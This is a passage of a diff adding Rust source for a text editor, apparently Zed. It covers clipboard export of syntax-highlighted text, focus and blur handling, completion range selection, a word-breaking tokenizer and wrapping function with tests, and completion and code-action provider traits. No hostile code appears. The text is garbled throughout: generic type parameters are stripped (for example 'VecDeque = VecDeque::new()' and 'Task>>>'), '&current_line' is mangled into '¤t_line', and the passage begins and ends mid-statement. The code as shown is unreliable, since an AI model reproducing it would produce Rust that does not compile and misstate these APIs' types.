Window, + cx: &mut Context, + ) { + #[derive(Serialize)] + struct Chunk<'a> { + text: String, + highlight: Option<&'a str>, + } + + let snapshot = self.buffer.read(cx).snapshot(cx); + let range = self + .selected_text_range(false, window, cx) + .and_then(|selection| { + if selection.range.is_empty() { + None + } else { + Some(selection.range) + } + }) + .unwrap_or_else(|| 0..snapshot.len()); + + let chunks = snapshot.chunks(range, true); + let mut lines = Vec::new(); + let mut line: VecDeque = VecDeque::new(); + + let Some(style) = self.style.as_ref() else { + return; + }; + + for chunk in chunks { + let highlight = chunk + .syntax_highlight_id + .and_then(|id| id.name(&style.syntax)); + let mut chunk_lines = chunk.text.split('\n').peekable(); + while let Some(text) = chunk_lines.next() { + let mut merged_with_last_token = false; + if let Some(last_token) = line.back_mut() { + if last_token.highlight == highlight { + last_token.text.push_str(text); + merged_with_last_token = true; + } + } + + if !merged_with_last_token { + line.push_back(Chunk { + text: text.into(), + highlight, + }); + } + + if chunk_lines.peek().is_some() { + if line.len() > 1 && line.front().unwrap().text.is_empty() { + line.pop_front(); + } + if line.len() > 1 && line.back().unwrap().text.is_empty() { + line.pop_back(); + } + + lines.push(mem::take(&mut line)); + } + } + } + + let Some(lines) = serde_json::to_string_pretty(&lines).log_err() else { + return; + }; + cx.write_to_clipboard(ClipboardItem::new_string(lines)); + } + + pub fn open_context_menu( + &mut self, + _: &OpenContextMenu, + window: &mut Window, + cx: &mut Context, + ) { + self.request_autoscroll(Autoscroll::newest(), cx); + let position = self.selections.newest_display(cx).start; + mouse_context_menu::deploy_context_menu(self, None, position, window, cx); + } + + pub fn inlay_hint_cache(&self) -> &InlayHintCache { + &self.inlay_hint_cache + } + + pub fn replay_insert_event( + &mut self, + text: &str, + relative_utf16_range: Option>, + window: &mut Window, + cx: &mut Context, + ) { + if !self.input_enabled { + cx.emit(EditorEvent::InputIgnored { text: text.into() }); + return; + } + if let Some(relative_utf16_range) = relative_utf16_range { + let selections = self.selections.all::(cx); + self.change_selections(None, window, cx, |s| { + let new_ranges = selections.into_iter().map(|range| { + let start = OffsetUtf16( + range + .head() + .0 + .saturating_add_signed(relative_utf16_range.start), + ); + let end = OffsetUtf16( + range + .head() + .0 + .saturating_add_signed(relative_utf16_range.end), + ); + start..end + }); + s.select_ranges(new_ranges); + }); + } + + self.handle_input(text, window, cx); + } + + pub fn supports_inlay_hints(&self, cx: &mut App) -> bool { + let Some(provider) = self.semantics_provider.as_ref() else { + return false; + }; + + let mut supports = false; + self.buffer().update(cx, |this, cx| { + this.for_each_buffer(|buffer| { + supports |= provider.supports_inlay_hints(buffer, cx); + }); + }); + + supports + } + + pub fn is_focused(&self, window: &Window) -> bool { + self.focus_handle.is_focused(window) + } + + fn handle_focus(&mut self, window: &mut Window, cx: &mut Context) { + cx.emit(EditorEvent::Focused); + + if let Some(descendant) = self + .last_focused_descendant + .take() + .and_then(|descendant| descendant.upgrade()) + { + window.focus(&descendant); + } else { + if let Some(blame) = self.blame.as_ref() { + blame.update(cx, GitBlame::focus) + } + + self.blink_manager.update(cx, |blink_manager, cx| { + blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { + buffer.finalize_last_transaction(cx); + if self.leader_peer_id.is_none() { + buffer.set_active_selections( + &self.selections.disjoint_anchors(), + self.selections.line_mode, + self.cursor_shape, + cx, + ); + } + }); + } + } + + fn handle_focus_in(&mut self, _: &mut Window, cx: &mut Context) { + cx.emit(EditorEvent::FocusedIn) + } + + fn handle_focus_out( + &mut self, + event: FocusOutEvent, + _window: &mut Window, + cx: &mut Context, + ) { + if event.blurred != self.focus_handle { + self.last_focused_descendant = Some(event.blurred); + } + self.refresh_inlay_hints(InlayHintRefreshReason::ModifiersChanged(false), cx); + } + + pub fn handle_blur(&mut self, window: &mut Window, cx: &mut Context) { + self.blink_manager.update(cx, BlinkManager::disable); + self.buffer + .update(cx, |buffer, cx| buffer.remove_active_selections(cx)); + + if let Some(blame) = self.blame.as_ref() { + blame.update(cx, GitBlame::blur) + } + if !self.hover_state.focused(window, cx) { + hide_hover(self, cx); + } + if !self + .context_menu + .borrow() + .as_ref() + .is_some_and(|context_menu| context_menu.focused(window, cx)) + { + self.hide_context_menu(window, cx); + } + self.discard_inline_completion(false, cx); + cx.emit(EditorEvent::Blurred); + cx.notify(); + } + + pub fn register_action( + &mut self, + listener: impl Fn(&A, &mut Window, &mut App) + 'static, + ) -> Subscription { + let id = self.next_editor_action_id.post_inc(); + let listener = Arc::new(listener); + self.editor_actions.borrow_mut().insert( + id, + Box::new(move |window, _| { + let listener = listener.clone(); + window.on_action(TypeId::of::(), move |action, phase, window, cx| { + let action = action.downcast_ref().unwrap(); + if phase == DispatchPhase::Bubble { + listener(action, window, cx) + } + }) + }), + ); + + let editor_actions = self.editor_actions.clone(); + Subscription::new(move || { + editor_actions.borrow_mut().remove(&id); + }) + } + + pub fn file_header_size(&self) -> u32 { + FILE_HEADER_HEIGHT + } + + pub fn restore( + &mut self, + revert_changes: HashMap, Rope)>>, + window: &mut Window, + cx: &mut Context, + ) { + let workspace = self.workspace(); + let project = self.project.as_ref(); + let save_tasks = self.buffer().update(cx, |multi_buffer, cx| { + let mut tasks = Vec::new(); + for (buffer_id, changes) in revert_changes { + if let Some(buffer) = multi_buffer.buffer(buffer_id) { + buffer.update(cx, |buffer, cx| { + buffer.edit( + changes + .into_iter() + .map(|(range, text)| (range, text.to_string())), + None, + cx, + ); + }); + + if let Some(project) = + project.filter(|_| multi_buffer.all_diff_hunks_expanded()) + { + project.update(cx, |project, cx| { + tasks.push((buffer.clone(), project.save_buffer(buffer, cx))); + }) + } + } + } + tasks + }); + cx.spawn_in(window, async move |_, cx| { + for (buffer, task) in save_tasks { + let result = task.await; + if result.is_err() { + let Some(path) = buffer + .read_with(cx, |buffer, cx| buffer.project_path(cx)) + .ok() + else { + continue; + }; + if let Some((workspace, path)) = workspace.as_ref().zip(path) { + let Some(task) = cx + .update_window_entity(&workspace, |workspace, window, cx| { + workspace + .open_path_preview(path, None, false, false, false, window, cx) + }) + .ok() + else { + continue; + }; + task.await.log_err(); + } + } + } + }) + .detach(); + self.change_selections(None, window, cx, |selections| selections.refresh()); + } + + pub fn to_pixel_point( + &self, + source: multi_buffer::Anchor, + editor_snapshot: &EditorSnapshot, + window: &mut Window, + ) -> Option> { + let source_point = source.to_display_point(editor_snapshot); + self.display_to_pixel_point(source_point, editor_snapshot, window) + } + + pub fn display_to_pixel_point( + &self, + source: DisplayPoint, + editor_snapshot: &EditorSnapshot, + window: &mut Window, + ) -> Option> { + let line_height = self.style()?.text.line_height_in_pixels(window.rem_size()); + let text_layout_details = self.text_layout_details(window); + let scroll_top = text_layout_details + .scroll_anchor + .scroll_position(editor_snapshot) + .y; + + if source.row().as_f32() < scroll_top.floor() { + return None; + } + let source_x = editor_snapshot.x_for_display_point(source, &text_layout_details); + let source_y = line_height * (source.row().as_f32() - scroll_top); + Some(gpui::Point::new(source_x, source_y)) + } + + pub fn has_visible_completions_menu(&self) -> bool { + !self.edit_prediction_preview_is_active() + && self.context_menu.borrow().as_ref().map_or(false, |menu| { + menu.visible() && matches!(menu, CodeContextMenu::Completions(_)) + }) + } + + pub fn register_addon(&mut self, instance: T) { + self.addons + .insert(std::any::TypeId::of::(), Box::new(instance)); + } + + pub fn unregister_addon(&mut self) { + self.addons.remove(&std::any::TypeId::of::()); + } + + pub fn addon(&self) -> Option<&T> { + let type_id = std::any::TypeId::of::(); + self.addons + .get(&type_id) + .and_then(|item| item.to_any().downcast_ref::()) + } + + pub fn addon_mut(&mut self) -> Option<&mut T> { + let type_id = std::any::TypeId::of::(); + self.addons + .get_mut(&type_id) + .and_then(|item| item.to_any_mut()?.downcast_mut::()) + } + + fn character_size(&self, window: &mut Window) -> gpui::Size { + let text_layout_details = self.text_layout_details(window); + let style = &text_layout_details.editor_style; + let font_id = window.text_system().resolve_font(&style.text.font()); + let font_size = style.text.font_size.to_pixels(window.rem_size()); + let line_height = style.text.line_height_in_pixels(window.rem_size()); + let em_width = window.text_system().em_width(font_id, font_size).unwrap(); + + gpui::Size::new(em_width, line_height) + } + + pub fn wait_for_diff_to_load(&self) -> Option>> { + self.load_diff_task.clone() + } + + fn read_metadata_from_db( + &mut self, + item_id: u64, + workspace_id: WorkspaceId, + window: &mut Window, + cx: &mut Context, + ) { + if self.is_singleton(cx) + && WorkspaceSettings::get(None, cx).restore_on_startup != RestoreOnStartupBehavior::None + { + let buffer_snapshot = OnceCell::new(); + + if let Some(folds) = DB.get_editor_folds(item_id, workspace_id).log_err() { + if !folds.is_empty() { + let snapshot = + buffer_snapshot.get_or_init(|| self.buffer.read(cx).snapshot(cx)); + self.fold_ranges( + folds + .into_iter() + .map(|(start, end)| { + snapshot.clip_offset(start, Bias::Left) + ..snapshot.clip_offset(end, Bias::Right) + }) + .collect(), + false, + window, + cx, + ); + } + } + + if let Some(selections) = DB.get_editor_selections(item_id, workspace_id).log_err() { + if !selections.is_empty() { + let snapshot = + buffer_snapshot.get_or_init(|| self.buffer.read(cx).snapshot(cx)); + self.change_selections(None, window, cx, |s| { + s.select_ranges(selections.into_iter().map(|(start, end)| { + snapshot.clip_offset(start, Bias::Left) + ..snapshot.clip_offset(end, Bias::Right) + })); + }); + } + }; + } + + self.read_scroll_position_from_db(item_id, workspace_id, window, cx); + } +} + +fn vim_enabled(cx: &App) -> bool { + cx.global::() + .raw_user_settings() + .get("vim_mode") + == Some(&serde_json::Value::Bool(true)) +} + +// Consider user intent and default settings +fn choose_completion_range( + completion: &Completion, + intent: CompletionIntent, + buffer: &Entity, + cx: &mut Context, +) -> Range { + fn should_replace( + completion: &Completion, + insert_range: &Range, + intent: CompletionIntent, + completion_mode_setting: LspInsertMode, + buffer: &Buffer, + ) -> bool { + // specific actions take precedence over settings + match intent { + CompletionIntent::CompleteWithInsert => return false, + CompletionIntent::CompleteWithReplace => return true, + CompletionIntent::Complete | CompletionIntent::Compose => {} + } + + match completion_mode_setting { + LspInsertMode::Insert => false, + LspInsertMode::Replace => true, + LspInsertMode::ReplaceSubsequence => { + let mut text_to_replace = buffer.chars_for_range( + buffer.anchor_before(completion.replace_range.start) + ..buffer.anchor_after(completion.replace_range.end), + ); + let mut completion_text = completion.new_text.chars(); + + // is `text_to_replace` a subsequence of `completion_text` + text_to_replace + .all(|needle_ch| completion_text.any(|haystack_ch| haystack_ch == needle_ch)) + } + LspInsertMode::ReplaceSuffix => { + let range_after_cursor = insert_range.end..completion.replace_range.end; + + let text_after_cursor = buffer + .text_for_range( + buffer.anchor_before(range_after_cursor.start) + ..buffer.anchor_after(range_after_cursor.end), + ) + .collect::(); + completion.new_text.ends_with(&text_after_cursor) + } + } + } + + let buffer = buffer.read(cx); + + if let CompletionSource::Lsp { + insert_range: Some(insert_range), + .. + } = &completion.source + { + let completion_mode_setting = + language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx) + .completions + .lsp_insert_mode; + + if !should_replace( + completion, + &insert_range, + intent, + completion_mode_setting, + buffer, + ) { + return insert_range.to_offset(buffer); + } + } + + completion.replace_range.to_offset(buffer) +} + +fn insert_extra_newline_brackets( + buffer: &MultiBufferSnapshot, + range: Range, + language: &language::LanguageScope, +) -> bool { + let leading_whitespace_len = buffer + .reversed_chars_at(range.start) + .take_while(|c| c.is_whitespace() && *c != '\n') + .map(|c| c.len_utf8()) + .sum::(); + let trailing_whitespace_len = buffer + .chars_at(range.end) + .take_while(|c| c.is_whitespace() && *c != '\n') + .map(|c| c.len_utf8()) + .sum::(); + let range = range.start - leading_whitespace_len..range.end + trailing_whitespace_len; + + language.brackets().any(|(pair, enabled)| { + let pair_start = pair.start.trim_end(); + let pair_end = pair.end.trim_start(); + + enabled + && pair.newline + && buffer.contains_str_at(range.end, pair_end) + && buffer.contains_str_at(range.start.saturating_sub(pair_start.len()), pair_start) + }) +} + +fn insert_extra_newline_tree_sitter(buffer: &MultiBufferSnapshot, range: Range) -> bool { + let (buffer, range) = match buffer.range_to_buffer_ranges(range).as_slice() { + [(buffer, range, _)] => (*buffer, range.clone()), + _ => return false, + }; + let pair = { + let mut result: Option = None; + + for pair in buffer + .all_bracket_ranges(range.clone()) + .filter(move |pair| { + pair.open_range.start <= range.start && pair.close_range.end >= range.end + }) + { + let len = pair.close_range.end - pair.open_range.start; + + if let Some(existing) = &result { + let existing_len = existing.close_range.end - existing.open_range.start; + if len > existing_len { + continue; + } + } + + result = Some(pair); + } + + result + }; + let Some(pair) = pair else { + return false; + }; + pair.newline_only + && buffer + .chars_for_range(pair.open_range.end..range.start) + .chain(buffer.chars_for_range(range.end..pair.close_range.start)) + .all(|c| c.is_whitespace() && c != '\n') +} + +fn get_uncommitted_diff_for_buffer( + project: &Entity, + buffers: impl IntoIterator>, + buffer: Entity, + cx: &mut App, +) -> Task<()> { + let mut tasks = Vec::new(); + project.update(cx, |project, cx| { + for buffer in buffers { + if project::File::from_dyn(buffer.read(cx).file()).is_some() { + tasks.push(project.open_uncommitted_diff(buffer.clone(), cx)) + } + } + }); + cx.spawn(async move |cx| { + let diffs = future::join_all(tasks).await; + buffer + .update(cx, |buffer, cx| { + for diff in diffs.into_iter().flatten() { + buffer.add_diff(diff, cx); + } + }) + .ok(); + }) +} + +fn char_len_with_expanded_tabs(offset: usize, text: &str, tab_size: NonZeroU32) -> usize { + let tab_size = tab_size.get() as usize; + let mut width = offset; + + for ch in text.chars() { + width += if ch == '\t' { + tab_size - (width % tab_size) + } else { + 1 + }; + } + + width - offset +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_string_size_with_expanded_tabs() { + let nz = |val| NonZeroU32::new(val).unwrap(); + assert_eq!(char_len_with_expanded_tabs(0, "", nz(4)), 0); + assert_eq!(char_len_with_expanded_tabs(0, "hello", nz(4)), 5); + assert_eq!(char_len_with_expanded_tabs(0, "\thello", nz(4)), 9); + assert_eq!(char_len_with_expanded_tabs(0, "abc\tab", nz(4)), 6); + assert_eq!(char_len_with_expanded_tabs(0, "hello\t", nz(4)), 8); + assert_eq!(char_len_with_expanded_tabs(0, "\t\t", nz(8)), 16); + assert_eq!(char_len_with_expanded_tabs(0, "x\t", nz(8)), 8); + assert_eq!(char_len_with_expanded_tabs(7, "x\t", nz(8)), 9); + } +} + +/// Tokenizes a string into runs of text that should stick together, or that is whitespace. +struct WordBreakingTokenizer<'a> { + input: &'a str, +} + +impl<'a> WordBreakingTokenizer<'a> { + fn new(input: &'a str) -> Self { + Self { input } + } +} + +fn is_char_ideographic(ch: char) -> bool { + use unicode_script::Script::*; + use unicode_script::UnicodeScript; + matches!(ch.script(), Han | Tangut | Yi) +} + +fn is_grapheme_ideographic(text: &str) -> bool { + text.chars().any(is_char_ideographic) +} + +fn is_grapheme_whitespace(text: &str) -> bool { + text.chars().any(|x| x.is_whitespace()) +} + +fn should_stay_with_preceding_ideograph(text: &str) -> bool { + text.chars().next().map_or(false, |ch| { + matches!(ch, '。' | '、' | ',' | '?' | '!' | ':' | ';' | '…') + }) +} + +#[derive(PartialEq, Eq, Debug, Clone, Copy)] +enum WordBreakToken<'a> { + Word { token: &'a str, grapheme_len: usize }, + InlineWhitespace { token: &'a str, grapheme_len: usize }, + Newline, +} + +impl<'a> Iterator for WordBreakingTokenizer<'a> { + /// Yields a span, the count of graphemes in the token, and whether it was + /// whitespace. Note that it also breaks at word boundaries. + type Item = WordBreakToken<'a>; + + fn next(&mut self) -> Option { + use unicode_segmentation::UnicodeSegmentation; + if self.input.is_empty() { + return None; + } + + let mut iter = self.input.graphemes(true).peekable(); + let mut offset = 0; + let mut grapheme_len = 0; + if let Some(first_grapheme) = iter.next() { + let is_newline = first_grapheme == "\n"; + let is_whitespace = is_grapheme_whitespace(first_grapheme); + offset += first_grapheme.len(); + grapheme_len += 1; + if is_grapheme_ideographic(first_grapheme) && !is_whitespace { + if let Some(grapheme) = iter.peek().copied() { + if should_stay_with_preceding_ideograph(grapheme) { + offset += grapheme.len(); + grapheme_len += 1; + } + } + } else { + let mut words = self.input[offset..].split_word_bound_indices().peekable(); + let mut next_word_bound = words.peek().copied(); + if next_word_bound.map_or(false, |(i, _)| i == 0) { + next_word_bound = words.next(); + } + while let Some(grapheme) = iter.peek().copied() { + if next_word_bound.map_or(false, |(i, _)| i == offset) { + break; + }; + if is_grapheme_whitespace(grapheme) != is_whitespace + || (grapheme == "\n") != is_newline + { + break; + }; + offset += grapheme.len(); + grapheme_len += 1; + iter.next(); + } + } + let token = &self.input[..offset]; + self.input = &self.input[offset..]; + if token == "\n" { + Some(WordBreakToken::Newline) + } else if is_whitespace { + Some(WordBreakToken::InlineWhitespace { + token, + grapheme_len, + }) + } else { + Some(WordBreakToken::Word { + token, + grapheme_len, + }) + } + } else { + None + } + } +} + +#[test] +fn test_word_breaking_tokenizer() { + let tests: &[(&str, &[WordBreakToken<'static>])] = &[ + ("", &[]), + (" ", &[whitespace(" ", 2)]), + ("Ʒ", &[word("Ʒ", 1)]), + ("Ǽ", &[word("Ǽ", 1)]), + ("⋑", &[word("⋑", 1)]), + ("⋑⋑", &[word("⋑⋑", 2)]), + ( + "原理,进而", + &[word("原", 1), word("理,", 2), word("进", 1), word("而", 1)], + ), + ( + "hello world", + &[word("hello", 5), whitespace(" ", 1), word("world", 5)], + ), + ( + "hello, world", + &[word("hello,", 6), whitespace(" ", 1), word("world", 5)], + ), + ( + " hello world", + &[ + whitespace(" ", 2), + word("hello", 5), + whitespace(" ", 1), + word("world", 5), + ], + ), + ( + "这是什么 \n 钢笔", + &[ + word("这", 1), + word("是", 1), + word("什", 1), + word("么", 1), + whitespace(" ", 1), + newline(), + whitespace(" ", 1), + word("钢", 1), + word("笔", 1), + ], + ), + (" mutton", &[whitespace(" ", 1), word("mutton", 6)]), + ]; + + fn word(token: &'static str, grapheme_len: usize) -> WordBreakToken<'static> { + WordBreakToken::Word { + token, + grapheme_len, + } + } + + fn whitespace(token: &'static str, grapheme_len: usize) -> WordBreakToken<'static> { + WordBreakToken::InlineWhitespace { + token, + grapheme_len, + } + } + + fn newline() -> WordBreakToken<'static> { + WordBreakToken::Newline + } + + for (input, result) in tests { + assert_eq!( + WordBreakingTokenizer::new(input) + .collect::>() + .as_slice(), + *result, + ); + } +} + +fn wrap_with_prefix( + line_prefix: String, + unwrapped_text: String, + wrap_column: usize, + tab_size: NonZeroU32, + preserve_existing_whitespace: bool, +) -> String { + let line_prefix_len = char_len_with_expanded_tabs(0, &line_prefix, tab_size); + let mut wrapped_text = String::new(); + let mut current_line = line_prefix.clone(); + + let tokenizer = WordBreakingTokenizer::new(&unwrapped_text); + let mut current_line_len = line_prefix_len; + let mut in_whitespace = false; + for token in tokenizer { + let have_preceding_whitespace = in_whitespace; + match token { + WordBreakToken::Word { + token, + grapheme_len, + } => { + in_whitespace = false; + if current_line_len + grapheme_len > wrap_column + && current_line_len != line_prefix_len + { + wrapped_text.push_str(current_line.trim_end()); + wrapped_text.push('\n'); + current_line.truncate(line_prefix.len()); + current_line_len = line_prefix_len; + } + current_line.push_str(token); + current_line_len += grapheme_len; + } + WordBreakToken::InlineWhitespace { + mut token, + mut grapheme_len, + } => { + in_whitespace = true; + if have_preceding_whitespace && !preserve_existing_whitespace { + continue; + } + if !preserve_existing_whitespace { + token = " "; + grapheme_len = 1; + } + if current_line_len + grapheme_len > wrap_column { + wrapped_text.push_str(current_line.trim_end()); + wrapped_text.push('\n'); + current_line.truncate(line_prefix.len()); + current_line_len = line_prefix_len; + } else if current_line_len != line_prefix_len || preserve_existing_whitespace { + current_line.push_str(token); + current_line_len += grapheme_len; + } + } + WordBreakToken::Newline => { + in_whitespace = true; + if preserve_existing_whitespace { + wrapped_text.push_str(current_line.trim_end()); + wrapped_text.push('\n'); + current_line.truncate(line_prefix.len()); + current_line_len = line_prefix_len; + } else if have_preceding_whitespace { + continue; + } else if current_line_len + 1 > wrap_column && current_line_len != line_prefix_len + { + wrapped_text.push_str(current_line.trim_end()); + wrapped_text.push('\n'); + current_line.truncate(line_prefix.len()); + current_line_len = line_prefix_len; + } else if current_line_len != line_prefix_len { + current_line.push(' '); + current_line_len += 1; + } + } + } + } + + if !current_line.is_empty() { + wrapped_text.push_str(¤t_line); + } + wrapped_text +} + +#[test] +fn test_wrap_with_prefix() { + assert_eq!( + wrap_with_prefix( + "# ".to_string(), + "abcdefg".to_string(), + 4, + NonZeroU32::new(4).unwrap(), + false, + ), + "# abcdefg" + ); + assert_eq!( + wrap_with_prefix( + "".to_string(), + "\thello world".to_string(), + 8, + NonZeroU32::new(4).unwrap(), + false, + ), + "hello\nworld" + ); + assert_eq!( + wrap_with_prefix( + "// ".to_string(), + "xx \nyy zz aa bb cc".to_string(), + 12, + NonZeroU32::new(4).unwrap(), + false, + ), + "// xx yy zz\n// aa bb cc" + ); + assert_eq!( + wrap_with_prefix( + String::new(), + "这是什么 \n 钢笔".to_string(), + 3, + NonZeroU32::new(4).unwrap(), + false, + ), + "这是什\n么 钢\n笔" + ); +} + +pub trait CollaborationHub { + fn collaborators<'a>(&self, cx: &'a App) -> &'a HashMap; + fn user_participant_indices<'a>(&self, cx: &'a App) -> &'a HashMap; + fn user_names(&self, cx: &App) -> HashMap; +} + +impl CollaborationHub for Entity { + fn collaborators<'a>(&self, cx: &'a App) -> &'a HashMap { + self.read(cx).collaborators() + } + + fn user_participant_indices<'a>(&self, cx: &'a App) -> &'a HashMap { + self.read(cx).user_store().read(cx).participant_indices() + } + + fn user_names(&self, cx: &App) -> HashMap { + let this = self.read(cx); + let user_ids = this.collaborators().values().map(|c| c.user_id); + this.user_store().read_with(cx, |user_store, cx| { + user_store.participant_names(user_ids, cx) + }) + } +} + +pub trait SemanticsProvider { + fn hover( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>; + + fn inline_values( + &self, + buffer_handle: Entity, + range: Range, + cx: &mut App, + ) -> Option>>>; + + fn inlay_hints( + &self, + buffer_handle: Entity, + range: Range, + cx: &mut App, + ) -> Option>>>; + + fn resolve_inlay_hint( + &self, + hint: InlayHint, + buffer_handle: Entity, + server_id: LanguageServerId, + cx: &mut App, + ) -> Option>>; + + fn supports_inlay_hints(&self, buffer: &Entity, cx: &mut App) -> bool; + + fn document_highlights( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>>; + + fn definitions( + &self, + buffer: &Entity, + position: text::Anchor, + kind: GotoDefinitionKind, + cx: &mut App, + ) -> Option>>>; + + fn range_for_rename( + &self, + buffer: &Entity, + position: text::Anchor, + cx: &mut App, + ) -> Option>>>>; + + fn perform_rename( + &self, + buffer: &Entity, + position: text::Anchor, + new_name: String, + cx: &mut App, + ) -> Option>>; +} + +pub trait CompletionProvider { + fn completions( + &self, + excerpt_id: ExcerptId, + buffer: &Entity, + buffer_position: text::Anchor, + trigger: CompletionContext, + window: &mut Window, + cx: &mut Context, + ) -> Task>>>; + + fn resolve_completions( + &self, + buffer: Entity, + completion_indices: Vec, + completions: Rc>>, + cx: &mut Context, + ) -> Task>; + + fn apply_additional_edits_for_completion( + &self, + _buffer: Entity, + _completions: Rc>>, + _completion_index: usize, + _push_to_history: bool, + _cx: &mut Context, + ) -> Task>> { + Task::ready(Ok(None)) + } + + fn is_completion_trigger( + &self, + buffer: &Entity, + position: language::Anchor, + text: &str, + trigger_in_words: bool, + cx: &mut Context, + ) -> bool; + + fn sort_completions(&self) -> bool { + true + } + + fn filter_completions(&self) -> bool { + true + } +} + +pub trait CodeActionProvider { + fn id(&self) -> Arc; + + fn code_actions( + &self, + buffer: &Entity, + range: Range, + window: &mut Window, + cx: &mut App, + ) -> Task>>; + + fn apply_code_action( + &self, + buffer_handle: Entity, + action: CodeAction, + excerpt_id: ExcerptId, + push_to_history: bool, + window: &mut Window, + cx: &mut App, + ) -> Task>; +} + +impl CodeActionProvider for Entity { + fn id(&self) -> Arc { + "project".into() + } + + fn code_actions( + &self, + buffer: &Entity, + range: Range, + _window: &mut Window, + cx: &mut App, + ) -> Task>> { + self.update(cx, |project, cx| { + let code_lens = project.code_lens(buffer, range.clone(), cx); + let code_actions = project.code_actions(buffer, range, None, cx); + cx.background_spawn(async move { + let (code_lens, code_actions) = join(code_lens, code_actions).await; + Ok(code_lens + .context("code lens fetch")? + .into_iter() + .chain(code_actions.context("code action fetch")?) + .collect()) + }) + }) + } + + fn apply_code_action( + &self, + buffer_handle: Entity, + action: CodeAction, + _excerpt_id: ExcerptId, + push_to_history: bool, + _window: &mut Window, + cx: &mut App, + ) -> Task> { + self.update(cx, |project, cx| { + project.apply_code_action(buffer_handle, action, push_to_history, cx) + }) + } +} + +fn snippet_completions( + project: &Project, + buffer: &Entity, + buffer_position: text::Anchor, + cx: &mut App, +) -> Task>> { + let languages = buffer.read(cx).languages_at(buffer_position); + let snippet_store = project.snippets().read(cx); + + let scopes: Vec<_> = languages + .iter() + .filter_map(|language| { + let language_name = language.lsp_id(); + let snippets = snippet_store.snippets_for(Some(language_name), cx); + + if snippets.is_empty() { + None + } else { + Some((language.default_scope(), snippets)) + } + }) + .collect(); + + if scopes.is_empty() { + return Task::ready(Ok(vec![])); + } + + let snapshot = buffer.read(cx).text_snapshot(); + let chars: String = snapshot + .reversed_chars_for_range(text::Anchor::MIN..buffer_position) + .collect(); + let executor = cx.background_executor().clone(); + + cx.background_spawn(async move { + let mut all_results: Vec = Vec::new(); + for (scope, snippets) in scopes.into_iter() { + let classifier = CharClassifier::new(Some(scope)).for_completion(true); + let mut last_word = chars + .chars() + .take_while(|c| classifier.is_word(*c)) + .collect::(); + last_word = last_word.chars().rev().collect(); + + if last_word.is_empty() { + return Ok(vec![]); + } + + let as_offset = text::ToOffset::to_offset(&buffer_position, &snapshot); + let to_lsp = |point: &text::Anchor| { + let end = text::ToPointUtf16::to_point_utf16(point, &snapshot); + point_to_lsp(end) + }; + let lsp_end = to_lsp(&buffer_position); + + let candidates = snippets + .iter() + .enumerate() + .flat_map(|(ix, snippet)| { + snippet + .prefix + .iter() + .map(move |prefix| StringMatchCandidate::new(ix, &prefix)) + }) + .collect::>(); + + let mut matches = fuzzy::match_strings( + &candidates, + &last_word, + last_word.chars().any(|c| c.is_uppercase()), + 100, + &Default::default(), + executor.clone(), + ) + .await; + + // Remove all candidates where the query's start does not match the start of any word in the candidate + if let Some(query_start) = last_word.chars().next() { + matches.retain(|string_match| { + split_words(&string_match.string).any(|word| { + // Check that the first codepoint of the word as lowercase matches the first + // codepoint of the query as lowercase + word.chars() + .flat_map(|codepoint| codepoint.to_lowercase()) + .zip(query_start.to_lowercase()) + .all(|(word_cp, query_cp)| word_cp == query_cp) + }) + }); + } + + let matched_strings = matches + .into_iter() + .map(|m| m.string) + .collect::>(); + + let mut result: Vec = snippets + .iter() + .filter_map(|snippet| { + let matching_prefix = snippet + .prefix + .iter() + .find(|prefix| matched_strings.contains(*prefix))?; + let start = as_offset - last_word.len(); + let start = snapshot.anchor_before(start); + let range = start..buffer_position; + let lsp_start = to_lsp(&start); + let lsp_range = lsp::Range { + start: lsp_start, + end: lsp_end, + }; + Some(Completion { + replace_range: range, + new_text: snippet.body.clone(), + source: CompletionSource::Lsp { + insert_range: None, + server_id: LanguageServerId(usize::MAX), + resolved: true, + lsp_completion: Box::new(lsp::CompletionItem { + label: snippet.prefix.first().unwrap().clone(), + kind: Some(CompletionItemKind::SNIPPET), + label_details: snippet.description.as_ref().map(|description| { + lsp::CompletionItemLabelDetails { + detail: Some(description.clone()), + description: None, + } + }), + insert_text_format: Some(InsertTextFormat::SNIPPET), + text_edit: Some(lsp::CompletionTextEdit::InsertAndReplace( + lsp::InsertReplaceEdit { + new_text: snippet.body.clone(), + insert: lsp_range, + replace: lsp_range, + }, + )), + filter_text: Some(snippet.body.clone()), + sort_text: Some(char::MAX.to_string()), + ..lsp::CompletionItem::default() + }), + lsp_defaults: None, + }, + label: CodeLabel { + text: matching_prefix.clone(), + runs: Vec::new(), + filter_range: 0..matching_prefix.len(), + }, + icon_path: None, + documentation: snippet.description.clone().map(|description| { + CompletionDocumentation::SingleLine(description.into()) + }), + insert_text_mode: None, + confirm: None, + }) + }) + .collect(); + + all_results.append(&mut result); + } + + Ok(all_results) + }) +} + +impl CompletionProvider for Entity { + fn completions( + &self, + _excerpt_id: ExcerptId, + buffer: &Entity, + buffer_position: text::Anchor, + options: CompletionContext, + _window: &mut Window, + cx: &mut Context, + ) -> Task>>> { + self.update(cx, |project, cx| { + let snippets = snippet_completions(project, buffer, buffer_position, cx); + let project_completions = project.completions(buffer, buffer_position, options, cx); + cx.background_spawn(async move { + let snippets_completions = snippets.await?; + match project_completions.await? { + Some(mut completions) => { + completions.extend(snippets_completions); + Ok(Some(completions)) + } + None => { + if snippets_completions.is_empty() { + Ok(None) + } else { + Ok(Some(snippets_completions)) + } + } + } + }) + }) + } + + fn resolve_completions( + &self, + buffer: Entity, + completion_indices: Vec, + completions: Rc>>, + cx: &mut Context, + ) -> Task> { + self.update(cx, |project, cx| { + project.lsp_store().update(cx, |lsp_store, cx| { + lsp_store.resolve_completions(buffer, completion_indices, completions, cx) + }) + }) + } + + fn apply_additional_edits_for_completion( + &self, + buffer: Entity, + completions: Rc>>, + completion_index: usize, + push_to_history: bool, + cx: &mut Context, + ) -> Task>> { + self.update(cx, |project, cx| { + project.lsp_store().update(cx, |lsp_store, cx| { + lsp_store.apply_additional_edits_for_completion( + buffer, + completions, + completion_index, + push_to_history, + cx, + ) + }) + }) + } + + fn is_completion_trigger( + &self, + buffer: &Entity, + position: language::Anchor, + text: &str, + trigger_in_words: bool, + cx: &mut Context, + ) -> bool { + let mut chars = text.chars(); + let char = if let Some(char) = chars.next() { + char + } else { + return false; + }; + if chars.next().is_some() { + return false; + } + + let buffer = 